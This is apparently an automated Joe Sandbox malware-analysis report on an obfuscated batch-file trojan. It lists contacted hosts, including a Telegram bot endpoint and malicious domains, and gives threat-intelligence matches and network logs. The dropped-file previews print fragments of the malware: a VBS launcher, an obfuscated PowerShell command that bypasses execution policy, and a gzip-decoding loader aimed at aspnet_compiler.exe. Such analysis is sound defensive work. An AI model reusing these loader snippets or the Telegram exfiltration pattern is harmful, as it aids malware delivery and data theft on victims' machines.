https://contoso.com/Icon | powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ipinfo.io | powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ipinfo.io/missX | powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot$BotToken/sendMessage | powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ipinfo.i | powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
168.119.208.219 | almamas.com.ly | Germany | 24940 | HETZNER-ASDE | true
178.208.169.197 | ducksex.ddnsfree.com | Netherlands | 22363 | PHMGMT-AS1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562421
Start date and time: 2024-11-25 15:21:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Pe4905VGl1.bat (renamed because the original name is a hash value)
Original Sample Name: 5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b.bat
Detection: MAL
Classification: mal100.troj.expl.evad.winBAT@38/13@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 26
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .bat
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 199.232.214.172, 40.69.42.241, 192.229.221.95, 199.232.210.172
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Pe4905VGl1.bat
Time | Type | Description
09:22:14 | API Interceptor | 111x Sleep call for process: powershell.exe modified
09:23:21 | API Interceptor | 6862126x Sleep call for process: aspnet_compiler.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | MSM8C42iAN.exe | malicious | DarkCloud |
149.154.167.220 | November Quotation.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | wMy37vlfvz.exe | malicious | DarkCloud |
149.154.167.220 | dekont 25.11.2024 PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | denizbank 25.11.2024 E80 aspc.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | order requirements CIF-TRC809910645210.exe | malicious | MassLogger RAT |
149.154.167.220 | NEW P.O.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | MC8017774DOCS.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | Pigroots.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
34.117.59.81 | FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd | malicious | Unknown | ipinfo.io/json
34.117.59.81 | 172.104.150.66.ps1 | malicious | Unknown | ipinfo.io/json
34.117.59.81 | VertusinstruccionesFedEX_66521.zip | malicious | Unknown | ipinfo.io/json
34.117.59.81 | UjbjOP.ps1 | malicious | Unknown | ipinfo.io/json
34.117.59.81 | I9xuKI2p2B.ps1 | malicious | Unknown | ipinfo.io/json
34.117.59.81 | licarisan_api.exe | malicious | Icarus | ipinfo.io/ip
34.117.59.81 | build.exe | malicious | Unknown | ipinfo.io/ip
34.117.59.81 | YjcgpfVBcm.bat | malicious | Unknown | ipinfo.io/json
34.117.59.81 | lePDF.cmd | malicious | Unknown | ipinfo.io/json
34.117.59.81 | 6Mpsoq1.php.ps1 | malicious | Unknown | ipinfo.io/json
178.208.169.197 | N1f691bk5G.ps1 | malicious | AsyncRAT |
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
ipinfo.io | Evjm8L1nEb.exe | malicious | Unknown | 34.117.59.81
ipinfo.io | mDHwap5GlV.exe | malicious | LummaC Stealer | 34.117.59.81
ipinfo.io | SystemCoreHelper.dll | malicious | LummaC Stealer | 34.117.59.81
ipinfo.io | y.bat | malicious | Braodo | 34.117.59.81
ipinfo.io | https://fxwf9-53194.portmap.io:53194/?x=sb232111 | malicious | Unknown | 34.117.59.81
ipinfo.io | https://trimmer.to:443/GWHMY | malicious | HTMLPhisher | 34.117.59.81
ipinfo.io | bose18mkt.bat | malicious | Abobus Obfuscator | 34.117.59.81
ipinfo.io | hnbose1711.bat | malicious | Abobus Obfuscator | 34.117.59.81
ipinfo.io | LzmJLVB41K.exe | malicious | DCRat, PureLog Stealer, zgRAT | 34.117.59.81
ipinfo.io | 2h2xLB9h1L.lnk | malicious | Abobus Obfuscator | 34.117.59.81
bg.microsoft.map.fastly.net | New Purchase Order Document for PO1136908 000 SE.exe | malicious | AgentTesla | 199.232.210.172
bg.microsoft.map.fastly.net | WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader | 199.232.214.172
bg.microsoft.map.fastly.net | dekont 25.11.2024 PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 199.232.210.172
bg.microsoft.map.fastly.net | Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msg | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | denizbank 25.11.2024 E80 aspc.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 199.232.214.172
bg.microsoft.map.fastly.net | http://propdfhub.com | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 05.Unzipped.obfhotel22-11.js | malicious | RHADAMANTHYS | 199.232.210.172
bg.microsoft.map.fastly.net | 412300061474#U00b7pdf.vbs | malicious | Remcos, GuLoader | 199.232.210.172
bg.microsoft.map.fastly.net | somes.exe | malicious | RedLine | 199.232.210.172
bg.microsoft.map.fastly.net | docx008.docx.doc | malicious | Unknown | 199.232.210.172
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUMSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      • 149.154.167.220
                                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      • 149.154.167.220
                                                                                                      dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGEvjm8L1nEb.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 34.117.59.81
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 34.116.198.130
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      HETZNER-ASDEhttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                                      • 5.161.110.190
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 49.13.32.95
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 49.13.32.95
                                                                                                      http://google.comGet hashmaliciousUnknownBrowse
                                                                                                      • 94.130.197.138
                                                                                                      rbCoIEGfDf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 91.107.151.211
                                                                                                      LWv5DuboZh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 91.107.151.211
                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 88.198.8.150
                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 144.79.19.125
                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 5.9.250.61
                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 49.13.42.140
                                                                                                      PHMGMT-AS1USN1f691bk5G.ps1Get hashmaliciousAsyncRATBrowse
                                                                                                      • 178.208.169.197
                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 178.208.190.219
                                                                                                      amen.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 45.255.208.12
                                                                                                      2xPiYIsfF2.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.103.230
                                                                                                      OhWWbQcp7Q.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                      • 128.90.129.125
                                                                                                      hb21QzBgft.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                      • 128.90.129.125
                                                                                                      U2DhKOFGy6.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      uVyl5BbR2M.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      ahMvIr4vjN.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      WlewaiA251.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://go.dgdp.net/Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      http://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):203
                                                                                                      Entropy (8bit):5.299439045576121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:G0FOd2PAZ/M0/jZj8XIBMSRVya5PaHKssMQ:BFKl/jZjCSRVBPeQ
                                                                                                      MD5:48C375C039C9FE2017AF2E593D3FA715
                                                                                                      SHA1:684CD6086BA8982E1D9E37FA8DE48A1CBEE37838
                                                                                                      SHA-256:75F0028EA10F4ED9120E1F39ED5CAC7D9406F33C38D753CAB48E35C2D1023858
                                                                                                      SHA-512:A86BD0CAFFE36E28F122EAD39F87F70A837D1C3588FB75510BCFE82A1D49978CF0927E5D29249A82A0701FF6938B1A4F7E97756BB3579B4CE9C1979C1DE879E5
                                                                                                      Malicious:true
                                                                                                      Preview:..Set MLDFUIFHSDCCQ = CreateObject("W" + ChrW(83) + "cript" + ChrW(46) + "Shell")..MLDFUIFHSDCCQ.Run(UpdaDI()),ChrW(48).Function UpdaDI().UpdaDI = UpdaDI + "C:\Users\Public\AXAGFIIEZBBS.bat".End Function
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):161
                                                                                                      Entropy (8bit):4.90173435614428
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:3AXq5MzYAGQqPJH0cVERAIrFjFC8hwjuucquuXj/quM8Pk+jVWvAJEXQhQBG:n5IYAGQO0cbY4mwSuJua//cYxY4Qs
                                                                                                      MD5:65774B43ED7213533BDBAACC392DE387
                                                                                                      SHA1:D092142CCC5B88899DA0091806D5249AC8D2EA04
                                                                                                      SHA-256:7C546286995AC2ACAF515D4105FFDB18F4FD6F69B1D7EBA583251B58532EF61D
                                                                                                      SHA-512:0B666036C54D77FCCBA4F77002FBCA7FA43E30E73D7F67AEEDF628DB81A442D0955B191475F670EA4E736CFB0E67A6E120CCFF17CC517AB7D6A073F2ECC7CEDF
                                                                                                      Malicious:true
                                                                                                      Preview:PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with very long lines (64623)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):255748
                                                                                                      Entropy (8bit):3.1900458877489832
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:NYzrwIovquFT/TO5HiSujupnwIE6YcG47rwnv1IJ5YH1llykZXvyd2b5uDSPVZrB:b
                                                                                                      MD5:33B6C435BDBBEC12AE8CBA21EB6D105F
                                                                                                      SHA1:41D43DC4EC1187E6120F26158E074E39475B0815
                                                                                                      SHA-256:D4F4D3196D92B306F65BA4F1F90EC73403803530A58196B48DB38210E3E3047D
                                                                                                      SHA-512:8B11308F7E16DC54E1559591D2D741F0A53D0A90C7DDB33BC817D15EDCDC46DC4EBEDD121925DA4C791D7BB8B0A6A74334F63253F6FC3AF453765F62826E4A4F
                                                                                                      Malicious:false
                                                                                                      Preview:.$love = "C:\Windows\Microsoft.".$love1 ="NET\Framework\v4.0.30319\aspnet_compiler.exe".$GBDWVQYONBIQDJWMDKUVUR = $love + $love1.$love2 = "C:\Windows\Microsoft.".$love22 = "NET\Framework\v2.0.50727\aspnet_compiler.exe".$TPNSJKKGOXEEPYKERBJHCHD = $love2 + $love22..function VHPDGARDLG {...[CmdletBinding()]. Param (...[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]. [byte[]] $byteArray = $(Throw("-byteArray is required")). )..Process {.. Write-Verbose "VHPDGARDLG". $input = New-Object System.IO.MemoryStream( , $byteArray ).. $output = New-Object System.IO.MemoryStream. $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress).. $gzipStream.CopyTo( $output ). $gzipStream.Close()...$input.Close()...[byte[]] $byteOutArray = $output.ToArray(). Write-Output $byteOutArray. }.}..[byte[]] $TZPFISFK = VHPDGARDLG(31,139,8,0,0,0,0,0,4,0,180,125,9,124,91,197,209,248,190
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11608
                                                                                                      Entropy (8bit):4.890472898059848
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2252
                                                                                                      Entropy (8bit):5.7466623645945365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:RXSU4y4RQmFoUeCamfm9qr9te08NfxBH+ffiEwab9npitpyhgFHRj7:RCHyIFKL2O9qr60KfnHMKEw4pitpyhQ7
                                                                                                      MD5:449B65E7629EE5D7264172FD2004F783
                                                                                                      SHA1:4142D4F49F237B734D93E9FA3EFE166D0366B586
                                                                                                      SHA-256:40FDC5A65ADDD1D8D370229DDACEEAA25C3EE7DACDCC188D07C3646C96044C90
                                                                                                      SHA-512:3128A6F3A4B974BB62907B9770C3F99877B3E789F11DDEF5C697247097C096C64E73C16F6BAFB1BC86DF1413443B8C64EB4B90296EF468378DAEC4B85EE230BA
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................R..............@..........@...............M6.]..O....PI.&).......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.@...............(..o...B.Rb&............Microsoft.VisualBasic...P...............
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):695409
                                                                                                      Entropy (8bit):7.924869791174031
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:N5ycy8sDhXndF1/vKPwAKbk0OWKsQ6l0t+vVGSwiVB3Q8s1RC7OG:N5Ry84ZnZq22DGlRVfBg8yC7J
                                                                                                      MD5:69CB2B5240F4E68C817464A84033ABEA
                                                                                                      SHA1:26763497A02664026B9827DFE16643E7C84D116A
                                                                                                      SHA-256:F290705C9C8033410D5FBA6E160FAD6C8DD35E6BDB211BF733A0B15603915AFA
                                                                                                      SHA-512:D22AC1AB9B6904D5EBC40572708CD51508806E69176979C68C488B1E916ADEA6122F316188229882457BD0FF894568D5B743D2604633938F33FE6B9D6219CE4A
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.eG......K=k.....nf...=s.7mf..W.MO7....".....!.pB....d.........B.;...A.$@....{.v.N.{\...d....x....,A....9..j.<.g...NN.h..^'?7..I.C..t....G.sB....O...:d....k.....q.t.}..|...}.&.......F.../.t?.......*.....Q.t.L..`...=...L.V...m.c..s.##1.......-Ss......'.._>..D.~....*.~.9...-.>z_5..{g...=....H.G.{p.s.,...-S..5>..sVt.\...z.....YT0...'.O,..zw...w..e.;...].R;.......1So.qf.[k..r[......L...b.......5.>^dL...i.xs.7.2..w..n.:o..Z..[..n...7..z...%.}..(.q...'..Gw.......__-..).(.f*./.f..).X...W.c.C.u.e4....6...7WK.K{.{m..u.d...|n.~....}..........w..^.VS{^Su.....~U.._..to).. .v.>.W.S...!..h.....]..s...}..].[.M......_]-.#...x.nin.+3.].hc....Z.W.7.=.v..i.ni....;]..E..........U..........N..%._.Y.[.n....c~Y..K.._....X..;..wL{....c`...R|.4.P.j.K2.v.4..I{.a...e.<bS.}.K....jj.Kr....~..[_....}X.}.....XK.l..f.4.mZ.Z..o...Z.u.n..S. .<0.|........lv~........S.....
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):78
                                                                                                      Entropy (8bit):2.956426879523995
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:QBelFslh6ElYRlUdIelXGlBwOGkpl4vl:QInEZnSeFGlHGkp29
                                                                                                      MD5:709D25F6948BF2877CB5DFC98D2D34F6
                                                                                                      SHA1:035683D074ED570809C21FDFA4E939830BF05A4B
                                                                                                      SHA-256:081AF7F140B3F0742D80DAA2CA9229A09451F0BD6FAF949A7D286D7DD1EF65B4
                                                                                                      SHA-512:160067DCCEDC6D09A83A948E64097FC10BD231D4D899E47E0DAE69F8E458B8EFAABD71ADCBE9155DA85C62FE6D181DBCE274E08FFF7023BE9F5CEBB1A41BD46A
                                                                                                      Malicious:false
                                                                                                      Preview:..d.a.b.9.b.b.f.4.-.a.9.b.a.-.4.1.e.9.-.a.b.7.a.-.e.c.d.d.7.4.1.9.3.6.e.7.....
                                                                                                      File type:ASCII text, with very long lines (5933)
                                                                                                      Entropy (8bit):4.749366276451975
                                                                                                      TrID:
                                                                                                        File name:Pe4905VGl1.bat
                                                                                                        File size:12'185 bytes
                                                                                                        MD5:4527c576f1af0580c8d96ac23c8f761c
                                                                                                        SHA1:dac3bf00eeb34c9c1d9dca63973f2e04da045383
                                                                                                        SHA256:5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b
                                                                                                        SHA512:7afacd9324fd02c60e927c71d8c4c6b3317984869224da2e6311a4a5963ebb74615ada91af129f9083d771dc069b4578c895c42f8d9154e814e94f8cc28361b9
                                                                                                        SSDEEP:192:kffffffffffffffffffffhffffffffffffffffffffQv/sfffffffffffffffffZ:kffffffffffffffffffffhfffffffffT
                                                                                                        TLSH:E342CD4743132AEE89C53A67E1AB900300F40B791264355D7BED35B3FABF4F992806E9
                                                                                                        File Content Preview::.:WMYJJPUCHVFWINWFBYSLHHLSLILPCIZJAYNIXRFMLRKUMJBWTGYGJJLHRKRQWBJVUCSMOG.:.:WMYJJPUCHVFWINWFBYSLHHLSLILPCIZJAYNIXRFMLRKUMJBWTGYGJJLHRKRQWBJVUCSMOG.:.:WMYJJPUCHVFWINWFBYSLHHLSLILPCIZJAYNIXRFMLRKUMJBWTGYGJJLHRKRQWBJVUCSMOG.:.:WMYJJPUCHVFWINWFBYSLHHLSLILPCI
                                                                                                        Icon Hash:9686878b929a9886
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 25, 2024 15:22:07.236963034 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.239916086 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.244189978 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.244271040 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.244272947 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.244322062 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.246603012 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.246710062 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.341001034 CET  443          49703      13.107.246.63   192.168.2.8
